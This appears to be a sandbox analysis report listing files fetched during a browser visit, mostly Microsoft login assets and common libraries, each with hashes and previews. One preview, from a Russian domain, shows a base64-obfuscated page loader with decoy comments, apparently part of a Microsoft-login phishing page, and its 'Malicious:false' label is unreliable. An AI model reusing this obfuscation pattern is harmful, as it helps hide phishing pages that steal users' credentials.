                                                                                  SHA-256:1F4EDBD2416E15BD82E61BA1A8E5558D44C4E914536B1B07712181BF57934021
                                                                                  SHA-512:1B4A3919E442EE4D2F30AE29B1C70DF7274E5428BCB6B3EDD84DCB92D60A0D6BDD9FA6D9DDE8EAB341FF4C12DE00A50858BF1FC5B6135B71E9E177F5A9ED34B9
                                                                                  Malicious:false
                                                                                  Reputation:moderate, very likely benign file
                                                                                  URL:https://login.live.com/Me.htm?v=3
                                                                                  Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 190152
                                                                                  Category:dropped
                                                                                  Size (bytes):61052
                                                                                  Entropy (8bit):7.996159932827634
                                                                                  Encrypted:true
                                                                                  SSDEEP:1536:HQaq1Q7XOos5ZBIp+1Zr52IGmCJijm1qAxTe9wzf:fq1HoUBIpU5TG7JSmwuTe+b
                                                                                  MD5:C1E82BF71ADD622AD0F3BF8572F634FC
                                                                                  SHA1:6CA863D4CAB96669202548D301693B3F5F80B0D5
                                                                                  SHA-256:BA48AF15D297DB450DC4870242482145ADDB2D18375A4871C490429E2DC5464A
                                                                                  SHA-512:820A7F8A0C8EA33A8FE1E90CDC35F45DC1E143E836B0D8EA047E1E312F8CAEC72CDEE4E7DB54760A4D749CD0ACFE103A27E39A9A56EB2D704E448A67B0D0C079
                                                                                  Malicious:false
                                                                                  Preview:...........iw.F.0.....'W...4)/qH#..D.L.EK...................().}.{..@.z........Qz.,..Ox.....i4..S.&.p......9..W....);a.].a....Y......Y<,.n..."`Is....5....P..|.-..x1.F...@...yRlG.O..5.Q.|.gy.c.^....r.EC.....xd.oL..$./..|3.......r^.j.}...M... )x.D.....%.....B..t....vZ....2L......px.G.1.*.lZYh...$.....,.../.a..;Q...._..#.....e.T.:trA_.0.:.f...........(I.x?.S...<7...o..0.`r.x.+.2..o+...4/..vzY7.C'.....!.r..4n....]P.+a..........._.8,..G>...{.4B....o.9.....r......X3..U.....'.0.@...lrX....r.W\e...].}....(.l......=........3....S..........^=D..[.zw6..e...<WQ.w.(.X..S....>.^.....^B..O-.(..U.R;h..v.......4.Dc .?..z....r.._.Y......M.a.?,...?..U.....OF.w\h$.Q..5....Q.Oj ....5U..8..Y......gYZM....y..OrY.z]B..y..;o.....oT.r...H..{K...Y&Q.......*..W....N4.......].0m..m........E.bc..~..e.. .nzS.i3^......).,Y}.=1H...... V...g.)....X..G...C....@o,.i.~...as...ehEH....u9l.2...y\J.?.(.I.q%..F#..D../>pr$...,...m.6..:,<s..~S.fl;k.'<..}z.Y.
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                                  Category:downloaded
                                                                                  Size (bytes):1435
                                                                                  Entropy (8bit):7.8613342322590265
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                                                  MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                                  SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                                  SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                                  SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                                  Malicious:false
                                                                                  URL:https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg
                                                                                  Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                  Category:downloaded
                                                                                  Size (bytes):48316
                                                                                  Entropy (8bit):5.6346993394709
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                  MD5:2CA03AD87885AB983541092B87ADB299
                                                                                  SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                  SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                  SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                  Malicious:false
                                                                                  URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                                  Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                                  Category:dropped
                                                                                  Size (bytes):1435
                                                                                  Entropy (8bit):7.8613342322590265
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                                                  MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                                  SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                                  SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                                  SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                                  Malicious:false
                                                                                  Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:PNG image data, 50 x 21, 8-bit/color RGB, non-interlaced
                                                                                  Category:downloaded
                                                                                  Size (bytes):61
                                                                                  Entropy (8bit):4.068159130770306
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:yionv//thPl9+mvChkxl/k4E08up:6v/lhP2mahk7Tp
                                                                                  MD5:B26986D6749C04C84092E7665CF15419
                                                                                  SHA1:333081FA661C9329AC42A210C92591731ABDF8BA
                                                                                  SHA-256:4558799E113EDD0B13ECDF00701921F158CB31C5120299AEFF637A071D9E3E9C
                                                                                  SHA-512:3155EB4F2EC16EE59EFF48B65DF305B592847FB32ED9C3229DA1E793F7684772995F626BD63EDD6D4B9F2550440E1853EB6DE68FDC7550D893286A9746F5F33F
                                                                                  Malicious:false
                                                                                  URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8fe6202638555e78/1736275745391/xSVrIn8xCejtnR6
                                                                                  Preview:.PNG........IHDR...2...........*h....IDAT.....$.....IEND.B`.
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 406986
                                                                                  Category:downloaded
                                                                                  Size (bytes):116343
                                                                                  Entropy (8bit):7.997640489040715
                                                                                  Encrypted:true
                                                                                  SSDEEP:3072:s8ovOS/D3L+TGsLMet6+iNLTMMqfC4hyFv0As5:jNSrij/t6+aAMqfCoydM5
                                                                                  MD5:3063B0DA40B45B46602FCE99AC53D315
                                                                                  SHA1:57883FF854B80AD2A76479A0273BE9218B4DA553
                                                                                  SHA-256:C60FB365DF08D31F36EDA468941C309AE3A917ED784A30495800F05E5F98B66B
                                                                                  SHA-512:3EAF55117A825B588972F6AE324F6173EF4F2A309BAB69A9A6CC43C8F9A4EE25C2FA86752C8912542CC353727DC54A034B369D4A4451F0C3B20206C16FA9FE98
                                                                                  Malicious:false
                                                                                  URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_27cef08ca792f8e8b149.js
                                                                                  Preview:...........k{.H.(.}............'qz<..>.3==..G..(..../m..]kU.T......|x....T.Z...O....T.........e..]../'.o+gp.k.........F....+#..+.{..|X..J.U.`.F.0...W..7.Ie...J2.Y.~.$.L.8....$...P]4..yQ.P99..P?....?........I%....+^0..&p..2..<........Da...J....F.9<.7.*^.+1O*.0J..........h1....[....h..............u".....C%.+..\.>....T`.1....... i......8.TB(.Uh.b.{...@<y..D^.S.....n".<H.L..O..*.t........p6..\[...yCm.J.k.....b..vg....-.j.$........1....p~3.b.....n....[_c..{1WN.l~.=...........?......S.}U..g.......t..../...........|.+...-y.X\...l.....>;."....ye.\.....h..p.f.8...[/..nd.,.......X.?......-....J.....I.;....t..FSw...a7i...c..Y{.-..>a..4h.Eo..c#...O....~..d....Z..z.'...s.D..E...jb.O.F..0.VW>..]%6........x..O>E.'a0U.....w....."..9.az.6....<a.?..<qvx........ct.K..s.C3..d#..#^R.z..A..u.f..........s.....M.rb(.\v.....%.k....i.f...,C.s..bY..K#...~.>..D..j....m.71..}...37h........P{..7!@...|..ZR.]V....."...0.o....7..peCG....px..j.%r2.....R.k5m..s.
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text, with very long lines (65447)
                                                                                  Category:dropped
                                                                                  Size (bytes):89501
                                                                                  Entropy (8bit):5.289893677458563
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                  MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                  SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                  SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                  SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                  Malicious:false
                                                                                  Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 142367
                                                                                  Category:dropped
                                                                                  Size (bytes):49911
                                                                                  Entropy (8bit):7.994516776763163
                                                                                  Encrypted:true
                                                                                  SSDEEP:1536:vr2T/J/l2R6ACJVMQPYmlBXTm12g9bcKo0y0ci:CzJ/lG2KQzBjm1b3ci
                                                                                  MD5:9B96CC09F9E89D0334BA2FBC22B5197A
                                                                                  SHA1:B5FE69F39E9F61FEF88DF794F02DC4F4086E2592
                                                                                  SHA-256:E6331018533143C411BAE25326AB52FCED541C48674551AEA78E750855BDCD1D
                                                                                  SHA-512:2BDD71A34A7D6172AD4B7B6CF077A891D6266C148000EEF8345E2343E6C21ED8783B2EA328EF3BF7176462A3CA575D2D6D4B55A07138CFD1B02900C95F61077D
                                                                                  Malicious:false
                                                                                  Preview:...........m[.8.0........OL....;w.....a.....\N.......h.r~........=........,..JU.......T~.l..?..y..2.X9.|xvP9...TN.......?.....qe.OE.~Gn,.J.T....0......r..#.V&Qx_I.De.._.8.+S?N..HL..J......%O..S........(=.gO.|.T.0......6.. ..y....x..*..8..p.T"1...|$.Cz..V.D%.Ie.F....^."..5....c...?..T8..._..b.gs.4....S]kDZ..7.J.V..l}..?.....c...g.A...8.......8.VB..*....^..f..O.*... ...`...H.{.$. OP..S..AC.gVE.I8..).-U.....R...A..%.T[...Fc{..49..If...y.'w.Q}..oz..v.....W...pp..%..G.+.r:.A.*.....[.:..s.?U......_............k.y0.U....+I5..0.>.Q%.".w.....O....5w..;.;.>..mr.k53r.......k.0.I.<.D......d&...c..jhE..zx.]....y|W....i...`.. .k.P...@.Uq.\;..1............z|.O..Y5..........XtR,....R...k3..<.*.\.2.>.;T..$...kj.5-.i?/..YH`!jb..Z..=.&.L..F...([..y....K5pzQ.>i.1.......0..P...@...L.".n.x..Cj?..w.:+...n..4..H.. .*....S.....h*....8....v.l.[M.0..q..c;.....0*..*.8.......l.TM..n "..km..S.<.T..].k.+1.....P.V...4-W.C....0-/.S;.w......K.z+...DZ....=q.E.@ .Dv.z...@.d.#tE...
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:HTML document, ASCII text, with very long lines (7485), with CRLF line terminators
                                                                                  Category:downloaded
                                                                                  Size (bytes):19897
                                                                                  Entropy (8bit):5.882603437169254
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:W4nuZHx5ZEce53RfdRPk3nuZHx5ZEce53RfdRPinlrGlrV:Ex5ZEce5LRPkux5ZEce5LRPinlrGlrV
                                                                                  MD5:F5088B208D389A0D733EDCB29913AF0B
                                                                                  SHA1:5EBA0612F13D49DBACD725B63F67C087BEF19FA4
                                                                                  SHA-256:C76CB7C86CDF6A387AFF424BBC8353B746037ADAB3D67EE9C9CE5FC8E4789040
                                                                                  SHA-512:28F3BDCF36510F3521658B1704788CA34C4526A7123C809FADF2A13567941D16EC9D00DF659B0231E87ED50CFBFEF368CF053874DFFF5E711C3CD542247C1C89
                                                                                  Malicious:false
                                                                                  URL:https://7x8x.digitalvoyage.ru/xaxb/
                                                                                  Preview: Don&#039;t watch the clock; do what it does. Keep going. -->.. All our dreams can come true if we have the courage to pursue them. -->..<script>../* The way to get started is to quit talking and begin doing. */..if(atob("aHR0cHM6Ly83WDh4LmRpZ2l0YWx2b3lhZ2UucnUveGF4Yi8=") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgs
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:HTML document, ASCII text, with very long lines (3450), with CRLF line terminators
                                                                                  Category:downloaded
                                                                                  Size (bytes):3452
                                                                                  Entropy (8bit):5.117912766689607
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:3qO9I9Sz9KHULI5m4UidBGLosqAsosushswsosry:a2IYz95qTdBac
                                                                                  MD5:CB06E9A552B197D5C0EA600B431A3407
                                                                                  SHA1:04E167433F2F1038C78F387F8A166BB6542C2008
                                                                                  SHA-256:1F4EDBD2416E15BD82E61BA1A8E5558D44C4E914536B1B07712181BF57934021
                                                                                  SHA-512:1B4A3919E442EE4D2F30AE29B1C70DF7274E5428BCB6B3EDD84DCB92D60A0D6BDD9FA6D9DDE8EAB341FF4C12DE00A50858BF1FC5B6135B71E9E177F5A9ED34B9
                                                                                  Malicious:false
                                                                                  URL:https://login.live.com/Me.htm?v=3
                                                                                  Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):72
                                                                                  Entropy (8bit):4.241202481433726
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                                                  MD5:9E576E34B18E986347909C29AE6A82C6
                                                                                  SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                                  SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                                  SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                                  Malicious:false
                                                                                  Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 450755
                                                                                  Category:downloaded
                                                                                  Size (bytes):122515
                                                                                  Entropy (8bit):7.997419459076181
                                                                                  Encrypted:true
                                                                                  SSDEEP:3072:1L4xVJNv/cJPu5OEjvuUQIq40zDH227PURbj:1kbGugELatzL7PUlj
                                                                                  MD5:AC9A6ED508328361A4C9530325A94076
                                                                                  SHA1:ADC81FAE51EB66A220539EEEDECEB96CFF390BBB
                                                                                  SHA-256:BA93F4A83BB77D32AF9AFB9B014BFD13FD497E3D8F15AF016C782ABD1D34037B
                                                                                  SHA-512:066D92389A7EFB3A80FCFC86696EE6AE008259570F73814303A9ACC1690F881DF2034A16D5C7970BA703648CA79C2E7CBAA2CAD98C28879ADD44AB06620305B4
                                                                                  Malicious:false
                                                                                  URL:https://aadcdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_kAx9qZOSH4g90FNHstHMCA2.js
                                                                                  Preview:...........}[.8......\&.L..{.x.t.nv.p......ql%xH...rB....J.-'..=...}...&.Jo.R..T*}.y..*.\....J....uipR..|zuT....(]..O..._.6.......?e%.;rb...F%?p.h.FN......|gZ.G.<..<..dn...~.@.....2T.y.K'J^K...*..6...P.....!).a.....6.. f.E......s..8.'......F.....KN.J1KJ.0J.x?..!B.Zcj....8t.....1......!vq..Ac.0..V.N..a..}(%a.5\..g..I..6...L...x.7.......8..B..J....^b/s.....I...r..L.3.... ..y...^K.l.....%.'.|.8.T.....$.R..8.j.?.R.f..}..o.....$....a.'..Q..g..p1.:1t.}..y..}8...3...8....b.=(..3..d[.*.Os......%....Z...G.......x...2.,..RP..+..O. _....n.;=.?.....w../au.I.p...U|;......WM.f?...9.>8..9.....S../;._..un...].:_..e..V*:.....@..[.*.Ue.'Pe..&wv..T..ow.........?..\)WVb..r.;.....A........mpW.X.........B.....I...}j.....(...1.e.D.~.....;F..:..P.=.....(r^........N1.F....@..W%y.....t...Q....Y.5.$.O..x@.l.4.a.b*.f..3.2.B...DL}4Y.:.u........`?....W`Z".S.S..}= .:......i.@E"1T.....`\.a....J:].....R....=R..y...*......s<;....~NXr<%...|.v&...5..*....D.(9...
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text, with very long lines (65447)
                                                                                  Category:downloaded
                                                                                  Size (bytes):89501
                                                                                  Entropy (8bit):5.289893677458563
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                  MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                  SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                  SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                  SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                  Malicious:false
                                                                                  URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                                  Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                                                                  Category:downloaded
                                                                                  Size (bytes):621
                                                                                  Entropy (8bit):7.673946009263606
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:Xp7fmqfW/e4YC2L0E5DZLB62y/+6lbPa1Gotq8mdd2Xmy2QLBwxD+QkCfBJ:Xp6qf2SCk3LBpy/rtPa1GKq8mOX5jLcD
                                                                                  MD5:4761405717E938D7E7400BB15715DB1E
                                                                                  SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                                                                  SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                                                                  SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                                                                  Malicious:false
                                                                                  URL:https://aadcdn.msauth.net/shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg
